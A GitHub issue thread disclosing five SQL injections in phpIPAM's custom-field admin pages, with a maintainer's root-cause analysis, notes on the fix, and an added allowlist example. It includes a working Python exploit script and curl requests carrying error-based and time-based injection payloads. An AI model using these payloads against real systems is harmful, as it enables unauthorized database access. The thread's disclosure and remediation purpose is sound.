Five sql injections on All Phpipam Versions. #2738
Comments
Hi @2ndGeorge

I think these issues have the same root cause. PDO->quote() isn't behaving as documented and escaping special characters in table names (at least on the machines I've tested); using bound parameters doesn't work for table names. I may just whitelist table names in queries and drop PDO->quote() completely to be safe. Non-trivial issue and fix.... may take a few days.

Hello @2ndGeorge
@GaryAllan the changes you've made remediate it in the exploit code I have put together. As this is in the Docker versions of the application, the patches were easy to test.

```python
#!/usr/bin/env python3
# Exploit Title: phpIPAM Custom Field Filter SQL Injection
# Exploit Announcement Date: September 16, 2019 5:18 AM
# Exploit Creation Date: September 27, 2019
# Vendor Homepage: https://phpipam.net
# Software Link: https://github.com/phpipam/phpipam/archive/1.4.tar.gz
# Version: 1.4
# Tested on: Ubuntu 18.04 / MariaDB 10.4
# Requires:
#   Python 3
#   requests package
# For more details, view:
#   https://github.com/phpipam/phpipam/issues/2738
#
# Example Output
# [+] Executing select user()
# [*] Received: phpipam@172.18.0.4
# [+] Executing select system_user()
# [*] Received: phpipam@172.18.0.4
# [+] Executing select @@version
# [*] Received: .4.8-MariaDB-1:10.4.8+maria~b
# [+] Executing select @@datadir
# [*] Received: /var/lib/mysq
# [+] Executing select @@hostname
# [*] Received: ubuntu
#
# (The values above were captured with str.lstrip()/str.rstrip() used as
#  prefix/suffix strippers. Those methods strip any run of the listed
#  characters, which is why the leading "10" and trailing "l" are missing.
#  The parsing below uses a regex on the error message instead.)
import re

from requests import Session

host = "localhost"
login_url = f"http://{host}/app/login/login_check.php"
exploit_url = f"http://{host}/app/admin/custom-fields/filter-result.php"

credentials = {
    "ipamusername": "Admin",
    "ipampassword": "Password",
}

# "table" is interpolated into a backtick-quoted identifier server side. The
# payload closes that identifier, evaluates the query inside updatexml() so
# MySQL reflects the result in its XPATH error, and comments out the rest
# of the statement with '#'.
payload = {
    "action": "add",
    "table": "",
}

cmds = {
    "unpriv": [
        "select user()",
        "select system_user()",
        "select @@version",
        "select @@datadir",
        "select @@hostname",
    ]
}

# MySQL reports the injected value as "XPATH syntax error: ':<result>'";
# the quoted part is truncated to 32 characters, leading ':' included.
RESULT_RE = re.compile(r"XPATH syntax error: ':(.*?)'")

if __name__ == "__main__":
    client = Session()
    resp = client.post(login_url, data=credentials)
    if resp.status_code == 200:
        for cmd in cmds["unpriv"]:
            print(f"[+] Executing {cmd}")
            payload["table"] = f"users`where 1=(updatexml(1,concat(0x3a,({cmd})),1))#`"
            resp = client.post(exploit_url, data=payload)
            match = RESULT_RE.search(resp.text)
            info = match.group(1) if match else resp.text.strip()
            print(f"[*] Received: {info}")
```
Thanks

Hi, I'm running 1.4. Is there a particular file I can download to remediate this or will I have to wait for the next release? Thanks

Hello @peawet08 Fixes have been applied to the 1.3, 1.4 and master branches. To download the 1.4 git branch
or
To update existing 1.4 branch
Describe the bug
Five SQL injections on all phpIPAM versions. The vulnerable files are:
/app/admin/custom-fields/edit.php
/app/admin/custom-fields/edit-result.php
/app/admin/custom-fields/filter.php
/app/admin/custom-fields/filter-result.php
/app/admin/custom-fields/order.php
phpIPAM version
All phpIPAM versions.
vulnerability 1
req:
```shell
curl 'http://testipam.com/app/admin/custom-fields/edit.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`where 1=(updatexml(1,concat(0x3a,(select user())),1))#`' --compressed --insecure
```
rsp:
We can find the user() info `root@172.21.0.3` in the response content.
vulnerability 2
req:
```shell
curl 'http://testipam.com/app/admin/custom-fields/edit-result.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`;select * from users where 1=sleep(10);#`&csrf_cookie=ylbgj5gvd5OFeTeVPMQVgCaD8zxMro1R&name=asdfadsf' --compressed --insecure
```
rsp:
The response takes more than 10s.
vulnerability 3
req:
```shell
curl 'http://testipam.com/app/admin/custom-fields/filter.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`where 1=(updatexml(1,concat(0x3a,(select user())),1))#`' --compressed --insecure
```
rsp:
vulnerability 4
req:
```shell
curl 'http://testipam.com/app/admin/custom-fields/filter-result.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`where 1=(updatexml(1,concat(0x3a,(select user())),1))#`' --compressed --insecure
```
rsp:
vulnerability 5
req:
```shell
curl 'http://testipam.com/app/admin/custom-fields/order.php' -H 'User-Agent: Mozilla/5.0 AppleWebKit/537.36 537.36' -H 'Cookie: phpipam=b852d916168309592ddade2e11847e48; table-page-size=50' -d 'action=add&table=users`;select * from users where 1=sleep(10);#`&current=1&next=3' --compressed --insecure
```
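The following is an added example, not phpIPAM's code or the reporter's, that shows the root cause GaryAllan describes above (a string-literal escaper such as PDO::quote() never touches the backtick that delimits an identifier, and placeholders cannot bind a table name) and the breakout shared by all five requests, where the `table` value closes the backtick-quoted identifier and the remainder runs as SQL. It runs against an in-memory SQLite database, which also accepts backtick identifiers; because updatexml() and the `#` comment are MySQL-only, the payload here uses `--` and simply widens the result set instead of reflecting data in an error. The `ALLOWED_TABLES` set, the `users` schema and its rows are constructed for the example; the project's own allowlist is whatever its fix chose.

```python
"""Identifier injection through a backtick-quoted table name, and the allowlist fix."""
import sqlite3

# Assumption: an illustrative set of tables a custom field may be attached to.
ALLOWED_TABLES = frozenset({"users", "subnets", "ipaddresses"})


def mysql_literal_quote(value: str) -> str:
    """Quote a value the way a PDO::quote()-style escaper does for MySQL:
    backslash-escape the string-literal specials and wrap in single quotes.
    The backtick is not on the list: it delimits identifiers, not strings,
    so an escaper built for values leaves an identifier breakout intact."""
    escaped = value
    for ch, rep in (("\\", "\\\\"), ("'", "\\'"), ('"', '\\"'),
                    ("\0", "\\0"), ("\n", "\\n"), ("\r", "\\r"), ("\x1a", "\\Z")):
        escaped = escaped.replace(ch, rep)
    return f"'{escaped}'"


def build_query_vulnerable(table: str) -> str:
    """Unsafe: the caller-supplied name is interpolated inside backticks.
    A bound parameter cannot replace it, because placeholders are only legal
    where a value can go, never where an identifier goes."""
    return f"SELECT name FROM `{table}` WHERE hidden = 0"


def is_allowed(table: str) -> bool:
    """Exact-match allowlist check; no normalisation, no escaping."""
    return table in ALLOWED_TABLES


def build_query_safe(table: str) -> str:
    """Safe: refuse anything that is not a known table name."""
    if not is_allowed(table):
        raise ValueError(f"table not allowed: {table!r}")
    return f"SELECT name FROM `{table}` WHERE hidden = 0"


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two visible users and one hidden one."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, hidden INTEGER)")
    conn.executemany("INSERT INTO users (name, hidden) VALUES (?, ?)",
                     [("alice", 0), ("bob", 0), ("svc_backup", 1)])
    return conn


def run(builder, table: str) -> list:
    """Build the query with the given builder and return the names it yields."""
    conn = make_db()
    try:
        return [row[0] for row in conn.execute(builder(table))]
    finally:
        conn.close()


# Same shape as the reported payloads: close the identifier, append a clause,
# comment out the rest of the statement (MySQL would use '#' instead of '--').
PAYLOAD = "users` WHERE 1=1 -- "

if __name__ == "__main__":
    print("vulnerable, honest input:", run(build_query_vulnerable, "users"))
    print("vulnerable, payload     :", run(build_query_vulnerable, PAYLOAD))
    print("literal-quoted payload  :", mysql_literal_quote(PAYLOAD))
    try:
        run(build_query_safe, PAYLOAD)
    except ValueError as exc:
        print("safe, payload rejected  :", exc)
```

The hardened builder deliberately does not try to escape the backtick (doubling it would work on MySQL, but it leaves the query shape under attacker control); an exact-match allowlist is the only way to keep an identifier position safe, which is the direction GaryAllan's comment takes.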